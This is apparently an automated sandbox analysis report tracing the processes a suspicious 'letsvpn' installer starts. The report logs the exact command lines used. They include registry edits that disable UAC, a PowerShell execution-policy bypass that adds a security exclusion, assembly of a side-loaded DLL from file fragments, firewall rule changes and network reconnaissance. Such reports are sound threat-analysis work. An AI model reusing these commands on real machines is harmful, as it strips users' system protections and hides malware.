Imagebase:	0x7ff6823d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:29:43
Start date:	20/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:29:43
Start date:	20/07/2024
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	ipconfig /all
Imagebase:	0x7ff690070000
File size:	35'840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:29:43
Start date:	20/07/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\netsh.exe" -f C:\ProgramData\24g5n.xml
Imagebase:	0x7ff614430000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:29:43
Start date:	20/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:29:49
Start date:	20/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\JM2KJ.bat"
Imagebase:	0x7ff6823d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:29:49
Start date:	20/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:29:49
Start date:	20/07/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
Imagebase:	0x7ff7e3e90000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:29:49
Start date:	20/07/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F
Imagebase:	0x7ff7e3e90000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:29:49
Start date:	20/07/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F
Imagebase:	0x7ff7e3e90000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:29:50
Start date:	20/07/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	10:29:52
Start date:	20/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\SQBg9\KQ3ts~m8\s+C:\ProgramData\SQBg9\KQ3ts~m8\a C:\ProgramData\SQBg9\KQ3ts~m8\uc_guilib.dll
Imagebase:	0x7ff6823d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:29:52
Start date:	20/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:29:54
Start date:	20/07/2024
Path:	C:\Windows\System32\mmc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\mmc.exe -Embedding
Imagebase:	0x7ff7acc00000
File size:	1'953'280 bytes
MD5 hash:	58C9E5172C3708A6971CA0CBC80FE8B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	10:29:54
Start date:	20/07/2024
Path:	C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe"
Imagebase:	0xc60000
File size:	99'904 bytes
MD5 hash:	8AA07B7C6C632F4EDF07A0E2B91F8566
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	10:29:55
Start date:	20/07/2024
Path:	C:\Windows\System32\mmc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\mmc.exe -Embedding
Imagebase:	0x7ff7acc00000
File size:	1'953'280 bytes
MD5 hash:	58C9E5172C3708A6971CA0CBC80FE8B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	10:29:56
Start date:	20/07/2024
Path:	C:\ProgramData\letsvpn-latest.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\letsvpn-latest.exe"
Imagebase:	0x400000
File size:	15'382'056 bytes
MD5 hash:	7CE62DC191CEE9DD1488C9D0A25FEDA4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:29:56
Start date:	20/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -inputformat none -ExecutionPolicy Bypass -Command "If ($env:PROCESSOR_ARCHITEW6432) { $env:PROCESSOR_ARCHITEW6432 } Else { $env:PROCESSOR_ARCHITECTURE }"
Imagebase:	0x2a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:29:56
Start date:	20/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:29:56
Start date:	20/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ipconfig /all
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:29:56
Start date:	20/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	10:29:56
Start date:	20/07/2024
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	ipconfig /all
Imagebase:	0x610000
File size:	29'184 bytes
MD5 hash:	3A3B9A5E00EF6A3F83BF300E2B6B67BB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	10:30:10
Start date:	20/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
Imagebase:	0x2a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	10:30:10
Start date:	20/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	10:30:22
Start date:	20/07/2024
Path:	C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
Imagebase:	0x7ff6ffbe0000
File size:	101'536 bytes
MD5 hash:	1E3CF83B17891AEE98C3E30012F0B034
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	10:30:22
Start date:	20/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	10:30:22
Start date:	20/07/2024
Path:	C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
Imagebase:	0x7ff6ffbe0000
File size:	101'536 bytes
MD5 hash:	1E3CF83B17891AEE98C3E30012F0B034
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	10:30:22
Start date:	20/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	10:30:24
Start date:	20/07/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	10:30:24
Start date:	20/07/2024
Path:	C:\Windows\System32\drvinst.exe
Wow64 process (32bit):	false
Commandline:	DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{d5789730-0a86-5a48-af99-19a03327caf5}\oemvista.inf" "9" "4d14a44ff" "000000000000014C" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\letsvpn\driver"
Imagebase:	0x7ff6df920000
File size:	337'920 bytes
MD5 hash:	294990C88B9D1FE0A54A1FA8BF4324D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	10:30:25
Start date:	20/07/2024
Path:	C:\Windows\System32\drvinst.exe
Wow64 process (32bit):	false
Commandline:	DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "000000000000014C"
Imagebase:	0x7ff6df920000
File size:	337'920 bytes
MD5 hash:	294990C88B9D1FE0A54A1FA8BF4324D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	10:30:25
Start date:	20/07/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	10:30:26
Start date:	20/07/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	10:30:26
Start date:	20/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c netsh advfirewall firewall Delete rule name=lets
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	10:30:26
Start date:	20/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	10:30:26
Start date:	20/07/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh advfirewall firewall Delete rule name=lets
Imagebase:	0xa60000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	10:30:26
Start date:	20/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c netsh advfirewall firewall Delete rule name=lets.exe
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	10:30:27
Start date:	20/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	10:30:27
Start date:	20/07/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh advfirewall firewall Delete rule name=lets.exe
Imagebase:	0xa60000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	10:30:27
Start date:	20/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	10:30:27
Start date:	20/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	10:30:27
Start date:	20/07/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh advfirewall firewall Delete rule name=LetsPRO.exe
Imagebase:	0xa60000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	10:30:27
Start date:	20/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	10:30:27
Start date:	20/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	10:30:27
Start date:	20/07/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh advfirewall firewall Delete rule name=LetsPRO
Imagebase:	0xa60000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	10:30:27
Start date:	20/07/2024
Path:	C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
Imagebase:	0x7ff6ffbe0000
File size:	101'536 bytes
MD5 hash:	1E3CF83B17891AEE98C3E30012F0B034
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	10:30:27
Start date:	20/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	10:30:31
Start date:	20/07/2024
Path:	C:\Program Files (x86)\letsvpn\LetsPRO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\letsvpn\LetsPRO.exe"
Imagebase:	0xf30000
File size:	247'272 bytes
MD5 hash:	8FC872149F0B8D2FB3D75C4076C0A8CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	10:30:32
Start date:	20/07/2024
Path:	C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe"
Imagebase:	0x7ff7403e0000
File size:	1'471'464 bytes
MD5 hash:	D664FB656FC05BE54EA49950688BE980
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	61
Start time:	10:30:37
Start date:	20/07/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
Imagebase:	0x7ff7934f0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	62
Start time:	10:30:37
Start date:	20/07/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	10:30:38
Start date:	20/07/2024
Path:	C:\Windows\System32\wbem\WmiApSrv.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\WmiApSrv.exe
Imagebase:	0x7ff7f9300000
File size:	209'920 bytes
MD5 hash:	9A48D32D7DBA794A40BF030DA500603B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	10:30:41
Start date:	20/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C ipconfig /all
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	10:30:41
Start date:	20/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	10:30:41
Start date:	20/07/2024
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	ipconfig /all
Imagebase:	0x610000
File size:	29'184 bytes
MD5 hash:	3A3B9A5E00EF6A3F83BF300E2B6B67BB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	10:30:42
Start date:	20/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C route print
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	10:30:42
Start date:	20/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	10:30:42
Start date:	20/07/2024
Path:	C:\Windows\SysWOW64\ROUTE.EXE
Wow64 process (32bit):	true
Commandline:	route print
Imagebase:	0x680000
File size:	19'456 bytes
MD5 hash:	C563191ED28A926BCFDB1071374575F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	10:30:43
Start date:	20/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C arp -a
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	10:30:43
Start date:	20/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	10:30:43
Start date:	20/07/2024
Path:	C:\Windows\SysWOW64\ARP.EXE
Wow64 process (32bit):	true
Commandline:	arp -a
Imagebase:	0x8f0000
File size:	22'528 bytes
MD5 hash:	4D3943EDBC9C7E18DC3469A21B30B3CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	10:30:48
Start date:	20/07/2024
Path:	C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe" /silent
Imagebase:	0xb90000
File size:	1'471'464 bytes
MD5 hash:	D664FB656FC05BE54EA49950688BE980
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	11.7%
Total number of Nodes:	1265
Total number of Limit Nodes:	31

Executed Functions

Function 00000001800060F0 Relevance: 49.9, APIs: 16, Strings: 12, Instructions: 919
sleeplibraryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001800050C0: ExitProcess.KERNEL32 ref: 00000001800050D5

LoadLibraryW.KERNEL32 ref: 0000000180006748
GetProcAddress.KERNEL32 ref: 000000018000677F
ShellExecuteW.SHELL32 ref: 00000001800067B9
LoadLibraryW.KERNEL32 ref: 0000000180006806
GetProcAddress.KERNEL32 ref: 0000000180006834
Sleep.KERNEL32 ref: 0000000180006842
DeleteFileW.KERNELBASE ref: 000000018000685F
CreateDirectoryW.KERNEL32 ref: 0000000180006953

Part of subcall function 00000001800075B4: wsprintfW.USER32 ref: 0000000180007645
Part of subcall function 00000001800075B4: SHGetSpecialFolderPathW.SHELL32 ref: 00000001800076BE
Part of subcall function 00000001800075B4: lstrcatW.KERNEL32 ref: 00000001800076D2
Part of subcall function 00000001800075B4: lstrcatW.KERNEL32 ref: 00000001800076E6
Part of subcall function 00000001800075B4: lstrcatW.KERNEL32 ref: 00000001800076FA

Sleep.KERNEL32 ref: 0000000180006A57

